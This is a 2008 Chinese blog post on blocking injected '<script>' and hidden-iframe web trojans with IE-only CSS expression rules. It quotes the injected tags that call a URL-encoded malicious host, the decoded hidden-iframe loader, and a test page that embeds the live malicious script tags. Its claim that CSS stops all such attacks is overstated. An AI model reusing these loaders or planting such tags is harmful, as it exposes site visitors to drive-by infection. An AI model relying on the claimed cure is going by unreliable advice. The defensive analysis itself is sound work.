二行代码解决全部网页木马


Posted in Javascript onMarch 28, 2008

 前不久一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:

注意,以下地址含有木马,请不要轻易访问:

<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:

document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!

...
var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码)
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么:

<script src=http://%76%63%63%64%2E%63%6E></script>

对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。

来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:

解决方案1:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/  
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');} 
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。

缺点:访客无法看到被感染了<script>木马的页面。

解决方案2:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}  
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');} 

原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了
解决方案3:
iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');}  
script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} 

原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的“停止”按钮一样。看来这是JS模拟IE停止按钮的一种方法。

解决方案4:

iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');}  
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');} 

原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。

解决方案5:

iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');}  
script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));} 

第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script> 

以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
<html xmlns="http://www.w3.org/1999/xhtml">  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
<title>让JS木马的进程迅速中止的CSS代码</title>  
<style type="text/css" id="LinrStudio">  
/*<![CDATA[*/  
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}  
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}  
/* 以后请在此关注最新木马处理方法:http://www.nihaoku.cn/ff/api.htm */  
/*]]>*/  
</style>  
</head>  
<body>  
<script type="text/javascript" src="1.js"></script>  
<script src=http://%76%63%63%64%2E%63%6E></script>  
<script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script>  
<script src=http://%76%63%63%64%2E%63%6E></script>  
我是页面本身的1  
<script src=http://%76%63%63%64%2E%63%6E></script>  
我是页面本身的2  
<script src=http://%76%63%63%64%2E%63%6E></script>  
我是页面本身的3  
<script src=http://%76%63%63%64%2E%63%6E></script>  
</body>  
</html>  
其中1.js是自己本站的:

document.write("我是本站的JS文件");
document.write("<img src='http://www.baidu.com/images/logo.gif' />");
我的测试环境是:

Windows XP SP2 和windows Vista SP1
IE6/IE7/IE8
已全部打好补丁。

综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。

大家也要仔细研究一下,看看我的代码有什么BUG,有的话一定要拿出来讨论,好解决问题!或是各位有其他更好的办法可以拿出来讨论一下。

Javascript 相关文章推荐
JavaScript加强之自定义callback示例
Sep 21 Javascript
用js判断输入是否为中文的函数
Mar 10 Javascript
javascript对JSON数据排序的3个例子
Apr 12 Javascript
用unescape反编码得出汉字示例
Apr 24 Javascript
浅谈javascript 归并方法
Jan 21 Javascript
jquery采用oop模式class类的使用示例
Jan 22 Javascript
jQuery简单实现页面元素置顶时悬浮效果示例
Aug 01 Javascript
详解vue 配合vue-resource调用接口获取数据
Jun 22 Javascript
JS实现鼠标拖拽盒子移动及右键点击盒子消失效果示例
Jan 29 Javascript
一步一步实现Vue的响应式(对象观测)
Sep 02 Javascript
vue-cli3 取消eslint校验代码的解决办法
Jan 16 Javascript
keep-alive不能缓存多层级路由菜单问题解决
Mar 10 Javascript
通过 Dom 方法提高 innerHTML 性能
Mar 26 #Javascript
js用图作提交按钮或超连接
Mar 26 #Javascript
利用js对象弹出一个层
Mar 26 #Javascript
javascript YUI 读码日记之 YAHOO.util.Dom - Part.4
Mar 22 #Javascript
Javascript YUI 读码日记之 YAHOO.util.Dom - Part.3
Mar 22 #Javascript
Javascript YUI 读码日记之 YAHOO.util.Dom - Part.2 0
Mar 22 #Javascript
YUI 读码日记之 YAHOO.util.Dom - Part.1
Mar 22 #Javascript
You might like
正则表达式语法
2006/10/09 Javascript
超级简单的php+mysql留言本源码
2009/11/11 PHP
php截取字符串函数分享
2015/02/02 PHP
Yii学习总结之数据访问对象 (DAO)
2015/02/22 PHP
php原生数据库分页的代码实例
2019/02/18 PHP
基于Jquery与WebMethod投票功能实现代码
2011/01/19 Javascript
简介可以自动完成UI的AngularJS工具angular-smarty
2015/06/23 Javascript
深入浅析同源策略和跨域访问
2015/11/26 Javascript
ionic组件ion-tabs选项卡切换效果实例
2016/08/27 Javascript
深入nodejs中流(stream)的理解
2017/03/27 NodeJs
解决Extjs下拉框不显示的问题
2017/06/21 Javascript
浅谈nodejs中的类定义和继承的套路
2017/07/26 NodeJs
JS实现查找数组中对象的属性值是否存在示例
2019/05/24 Javascript
[01:28]2014DOTA2国际邀请赛中国区预选赛四大豪门直升机抵达会场
2014/05/24 DOTA
[43:49]LGD vs CHAOS 2019国际邀请赛小组赛 BO2 第一场 8.15
2019/08/16 DOTA
在CentOS上配置Nginx+Gunicorn+Python+Flask环境的教程
2016/06/07 Python
利用Python破解斗地主残局详解
2017/06/30 Python
Python爬虫常用小技巧之设置代理IP
2018/09/13 Python
Pycharm2017版本设置启动时默认自动打开项目的方法
2018/10/29 Python
python 实现创建文件夹和创建日志文件的方法
2019/07/07 Python
Django获取应用下的所有models的例子
2019/08/30 Python
python实现输入三角形边长自动作图求面积案例
2020/04/12 Python
Keras保存模型并载入模型继续训练的实现
2021/02/20 Python
布局和排版教程 纯css3实现图片三角形排列
2014/10/17 HTML / CSS
阿巴庭院:Abba Patio
2019/06/18 全球购物
美国家居装饰店:Z Gallerie
2020/12/28 全球购物
土木工程个人自荐信范文
2013/11/30 职场文书
信息专业大学生自我评价分享
2014/01/17 职场文书
计算机网络专业自荐信
2014/07/04 职场文书
校外活动方案
2014/08/28 职场文书
大学生自我评价范文
2015/03/03 职场文书
工程技术员岗位职责
2015/04/11 职场文书
律师函格式范本
2015/05/27 职场文书
Java使用jmeter进行压力测试
2021/07/09 Java/Android
python绘制简单直方图(质量分布图)的方法
2022/04/21 Python
Python内置类型集合set和frozenset的使用详解
2022/04/26 Python